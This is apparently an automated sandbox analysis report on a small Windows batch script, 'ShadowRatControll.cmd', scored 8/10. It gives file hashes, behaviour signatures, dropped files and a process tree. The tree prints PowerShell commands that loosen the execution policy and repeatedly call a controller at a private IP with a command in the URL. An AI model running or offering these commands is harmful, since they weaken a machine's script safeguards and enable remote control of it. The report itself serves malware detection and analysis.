Overview

overview

10

Static

static

1

ShadowNet.cmd

windows10-2004-x64

10

ShadowNet.cmd

windows11-21h2-x64

8

ShadowRatControll.cmd

windows10-2004-x64

8

ShadowRatControll.cmd

windows11-21h2-x64

3

Analysis

  • max time kernel
    448s
  • max time network
    449s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 11:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ShadowRatControll.cmd

  • Size

    602B

  • MD5

    2e2408bf86c1692a75fd83903b2cab4f

  • SHA1

    726e9aee1fdfa97eb80e1f872b824678339fbb33

  • SHA256

    ddccf46bc8232e081972d2754279d7480595f6f5238ed1db01bb01d43694f645

  • SHA512

    3b71f1831a907114a512475f6a4b5cbdcad2b0e721c46d7a91cd37eab6c0bf51f2a6d6afd751065f43904fcd702fbf93a3ec6d86a2b0c6ef9f73bd44b606b7e7

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ShadowRatControll.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.0.36:65535/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.0.36:65535/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.0.36:65535/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.0.36:65535/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4236
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.0.36:65535/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4072

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d136d3411d4aa688242c53cafb993aa6

    SHA1

    1a81cc78e3ca445d5a5193e49ddce26d5e25179f

    SHA256

    00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

    SHA512

    282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    a285423309193b2724d32ccdaf3223e7

    SHA1

    6ecbf56fe6fe9609399b1a0f4bf04b3775ce0d28

    SHA256

    0c1d44d56a79461199b142ecd3d3d52c23953785ddb0157f7ad210e35c923ec7

    SHA512

    09baa328dd39cb4839a11b5f4fea5b6dabb4cf77fa9c633e05606e7ebb288c2f5b7fb701a06431d9701d6bee117da2fb6e34228cdd77bc210fadad349a43af8e

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    bc7b8ee0ccc5f73ebf0925f5c28817bb

    SHA1

    d8cc0a542e02f24dfdce92566e63acf63f599049

    SHA256

    9b08fdfc7cd439ff7e7596c9449914f095d1445263a8fc07d6f2f1a2c3475438

    SHA512

    04f9c577f8a76c67f515d44b1d24826389d93bbc8fa42ce41b173c8ee70fa176c2ba4d694105fca3a02f39da00e883d56d1d0e34fe94b7c363200a36e2836df6

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    bfef79efc0ea236c9a723cdb7c230b17

    SHA1

    fcd70a9e6ce088af2e55c1549bbbb05ff09dfdef

    SHA256

    864619e471b740b9ba986a30e6b1c67e6a6de107085e38f92078b2316a10950f

    SHA512

    1500aa8d090b20e8a7d8ac1a2b8d4c238cee972649c199b822a689ddd827a2c21116a3b9b6171bdcc3cc97adea7a38b6dd8adeeec630e2b90b8622b8e9d623a2

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4aa454de30ec963f8edd7e5c9514ffc

    SHA1

    6927d871fb009c755e662d86b7c608fa6a8e372a

    SHA256

    b9a516e671bbb9b6c9623378640302b1b63a362d881ada15e0051fea92c014db

    SHA512

    27e4cb54d11941f1ca443d9775212c6e7d7cdc7733675216a98d992b3429de6b6276883e6f75b1afb2ef65a4d601f2b88d37079b30717b1bdf1262ae2126fff6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ufyhm2et.l4d.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • memory/3600-32-0x00007FFDB6F50000-0x00007FFDB7A11000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3600-28-0x00007FFDB6F50000-0x00007FFDB7A11000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3600-19-0x00007FFDB6F50000-0x00007FFDB7A11000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3600-29-0x00007FFDB6F50000-0x00007FFDB7A11000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3600-30-0x00007FFDB6F50000-0x00007FFDB7A11000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4180-0-0x00007FFDB7033000-0x00007FFDB7035000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4180-15-0x00007FFDB7030000-0x00007FFDB7AF1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4180-12-0x00007FFDB7030000-0x00007FFDB7AF1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4180-11-0x00007FFDB7030000-0x00007FFDB7AF1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4180-10-0x000001AD5F820000-0x000001AD5F842000-memory.dmp
    Filesize

    136KB

    Download